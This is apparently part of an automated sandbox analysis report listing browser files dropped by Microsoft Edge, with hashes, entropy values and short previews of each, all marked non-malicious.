                                                                                                                                          Preview:2024/04/12-09:14:42.567 1f80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/04/12-09:14:42.568 1f80 Recovering log #3.2024/04/12-09:14:42.568 1f80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):408
                                                                                                                                          Entropy (8bit):5.286777045276449
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:CHCVv4Yeb8rcHEZrELFUt8Ndg/+NdI5LYeb8rcHEZrEZSJ:p54Yeb8nZrExg831SLYeb8nZrEZe
                                                                                                                                          MD5:86DADD5C1FAC10CBE2B87216E23323E3
                                                                                                                                          SHA1:1E5B70F74E59E182FD506F872A24EE2C58343DEE
                                                                                                                                          SHA-256:55286226835F6282C7B0912D2E29AE726C1BFE8D7F4646686BF8D11B9DB793BD
                                                                                                                                          SHA-512:D4CE60AD68955913407825863E0B809B40278B42FBAC1DD7C18FC047488DC7DA6E784B6B4DDE26801929FCE366BA7D0CEBBA3504396AC7D1072C28B0C657E064
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:42.567 1f80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/04/12-09:14:42.568 1f80 Recovering log #3.2024/04/12-09:14:42.568 1f80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):336
                                                                                                                                          Entropy (8bit):5.1470231429383535
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C1t0q2P923oH+Tcwt8a2jMGIFUt8N1fubZZmw+N1RPekwO923oH+Tcwt8a2jMmLJ:Ckv4Yeb8EFUt8NMbZ/+NbPe5LYeb8bJ
                                                                                                                                          MD5:7B3ED7319215D29B46B8158320DC4EF3
                                                                                                                                          SHA1:7BB87AB4DCF5362FAFFC9B463DC99A080867FA83
                                                                                                                                          SHA-256:0FC0F0DE919261D1516E4D6234F47B2EFC30DB965C91E81B35276651D9461624
                                                                                                                                          SHA-512:8C12733157C83005B9710795126D8ED548C7CB8CB058146961C594FEE4E1823E8E36EB8800DCBBED2F556214D803E0078C31346A3BB149319ED286F378F368CF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.525 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/04/12-09:14:39.526 1e30 Recovering log #3.2024/04/12-09:14:39.528 1e30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):336
                                                                                                                                          Entropy (8bit):5.1470231429383535
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:C1t0q2P923oH+Tcwt8a2jMGIFUt8N1fubZZmw+N1RPekwO923oH+Tcwt8a2jMmLJ:Ckv4Yeb8EFUt8NMbZ/+NbPe5LYeb8bJ
                                                                                                                                          MD5:7B3ED7319215D29B46B8158320DC4EF3
                                                                                                                                          SHA1:7BB87AB4DCF5362FAFFC9B463DC99A080867FA83
                                                                                                                                          SHA-256:0FC0F0DE919261D1516E4D6234F47B2EFC30DB965C91E81B35276651D9461624
                                                                                                                                          SHA-512:8C12733157C83005B9710795126D8ED548C7CB8CB058146961C594FEE4E1823E8E36EB8800DCBBED2F556214D803E0078C31346A3BB149319ED286F378F368CF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:2024/04/12-09:14:39.525 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/04/12-09:14:39.526 1e30 Recovering log #3.2024/04/12-09:14:39.528 1e30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\08dc3a29-0bfd-489b-831f-3f5408ed2d88.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\16324bac-1af0-430c-9688-7b1e7b63030e.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1301
                                                                                                                                          Entropy (8bit):5.354119559673209
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YcFGJ/I3RdsBZVMdmRds37ZFRudFGRw6C1E6ma3yeesw6maPsQYhbxP7nbI+:YcgCzsHtslfc7aleeBkhYhbxo+
                                                                                                                                          MD5:3EAAC4791DB4597498694B509E177AA4
                                                                                                                                          SHA1:FF31B3E4068AE03AFF247EA18926614EF2FC4545
                                                                                                                                          SHA-256:AC42E4EF792180457966C387ADB530FAFBDC0B7B41CFB3422CEFC880CAE96E16
                                                                                                                                          SHA-512:0ACCCCD0273B645DAFE89C9664AD9FE7FF8F7C8F5634DD7A78638917E91A8260C04E8E54A22F617E9FEF5145D722A251179EACE2A50BB9815CAECB0DD66FEEB1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359971685767028","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359971689513197","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.6280947341794558
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:TsKLopF+SawLUO1Xj8BwP2m/1J+MkNNb7gbEPdwlkSaLtbA2OX08:te+Au0JL+pNPSEPdw6J89X08
                                                                                                                                          MD5:9AF7B1C40FBD7A7090A05B3D1E92290A
                                                                                                                                          SHA1:F9F37F2A8873637F5EE47C67052031498058CD3B
                                                                                                                                          SHA-256:BFE9A77B7A80B1980750108BBDEAC525916877609B7CE452F3A0E88BC26CE5E0
                                                                                                                                          SHA-512:CA671AFC3FFE4BC233CACAF0F81CC36216B636A4DFA752A01800716810B2A9E9B085EAB8A41AA86FF49AE20B69552C22CC05AE800ED4C348A2B85BF6C9813106
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1301
                                                                                                                                          Entropy (8bit):5.354119559673209
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YcFGJ/I3RdsBZVMdmRds37ZFRudFGRw6C1E6ma3yeesw6maPsQYhbxP7nbI+:YcgCzsHtslfc7aleeBkhYhbxo+
                                                                                                                                          MD5:3EAAC4791DB4597498694B509E177AA4
                                                                                                                                          SHA1:FF31B3E4068AE03AFF247EA18926614EF2FC4545
                                                                                                                                          SHA-256:AC42E4EF792180457966C387ADB530FAFBDC0B7B41CFB3422CEFC880CAE96E16
                                                                                                                                          SHA-512:0ACCCCD0273B645DAFE89C9664AD9FE7FF8F7C8F5634DD7A78638917E91A8260C04E8E54A22F617E9FEF5145D722A251179EACE2A50BB9815CAECB0DD66FEEB1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359971685767028","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359971689513197","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):36864
                                                                                                                                          Entropy (8bit):1.0437591182292094
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBuY:JkIEumQv8m1ccnvS6df8mN
                                                                                                                                          MD5:93323B918FB63AE88F3FDA0FEC325D6F
                                                                                                                                          SHA1:5E9DE9AFE001DF9985E463F4DF1B768C9A93C868
                                                                                                                                          SHA-256:2BB116873AB7DC5631870FA4A8124F6CF4E658E3EB682957659FADAFA803094F
                                                                                                                                          SHA-512:15EFF9ECFF5A1D012FAE839B0F6265E2988D27BF3DA7B0E5A14D8CA7372B3D9EF942C472AF961E4C82410EE152BF31EBFB995EA08B1186EF055DBC4CF6C3628A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF34e7f.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF350f0.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40
                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b22814a7-a0f7-4c98-8679-df6aa498361b.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f66a25ef-ae27-4fdf-9bbc-b7f308d8614b.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[]

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f69d29e4-8cb0-435b-bc16-4d61f6b1f745.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40
                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9349
                                                                                                                                          Entropy (8bit):5.103076493312194
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stGkdps+s5ssZihnkbYM88bV+FiA66WMwaFIMYgPnYJ:stGQXs5sfhebGix6WhaTY1
                                                                                                                                          MD5:B15446FB19370F8618D94B5DCAAB0D44
                                                                                                                                          SHA1:886C8332ECB1319C4C6E0E77A8635194E19E0360
                                                                                                                                          SHA-256:649EE59CF2A6F374F83350D6FFF82C4FAA945AB0B158EC739D7CB27F132A266F
                                                                                                                                          SHA-512:BD80941257196D12C8BC39A778E803DDDB1F32DC72B79012AB8D9BF8485581C704300C464D4A477F257CD7294C290A7A595C6B7E6B3C2642E57DF4772D1E2BE6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3d92b.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9349
                                                                                                                                          Entropy (8bit):5.103076493312194
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stGkdps+s5ssZihnkbYM88bV+FiA66WMwaFIMYgPnYJ:stGQXs5sfhebGix6WhaTY1
                                                                                                                                          MD5:B15446FB19370F8618D94B5DCAAB0D44
                                                                                                                                          SHA1:886C8332ECB1319C4C6E0E77A8635194E19E0360
                                                                                                                                          SHA-256:649EE59CF2A6F374F83350D6FFF82C4FAA945AB0B158EC739D7CB27F132A266F
                                                                                                                                          SHA-512:BD80941257196D12C8BC39A778E803DDDB1F32DC72B79012AB8D9BF8485581C704300C464D4A477F257CD7294C290A7A595C6B7E6B3C2642E57DF4772D1E2BE6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF453d9.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9349
                                                                                                                                          Entropy (8bit):5.103076493312194
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stGkdps+s5ssZihnkbYM88bV+FiA66WMwaFIMYgPnYJ:stGQXs5sfhebGix6WhaTY1
                                                                                                                                          MD5:B15446FB19370F8618D94B5DCAAB0D44
                                                                                                                                          SHA1:886C8332ECB1319C4C6E0E77A8635194E19E0360
                                                                                                                                          SHA-256:649EE59CF2A6F374F83350D6FFF82C4FAA945AB0B158EC739D7CB27F132A266F
                                                                                                                                          SHA-512:BD80941257196D12C8BC39A778E803DDDB1F32DC72B79012AB8D9BF8485581C704300C464D4A477F257CD7294C290A7A595C6B7E6B3C2642E57DF4772D1E2BE6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13357379679684250","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_l

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF54240.TMP (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9349
                                                                                                                                          Entropy (8bit):5.103076493312194
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:stGkdps+s5ssZihnkbYM88bV+FiA66WMwaFIMYgPnYJ:stGQXs5sfhebGix6WhaTY1
                                                                                                                                          MD5:B15446FB19370F8618D94B5DCAAB0D44
                                                                                                                                          SHA1:886C8332ECB1319C4C6E0E77A8635194E19E0360
                                                                                                                                          SHA-256:649EE59CF2A6F374F83350D6FFF82C4FAA945AB0B158EC739D7CB27F132A266F
                                                                                                                                          SHA-512:BD80941257196D12C8BC39A778E803DDDB1F32DC72B79012AB8D9BF8485581C704300C464D4A477F257CD7294C290A7A595C6B7E6B3C2642E57DF4772D1E2BE6
                                                                                                                                          Malicious:false
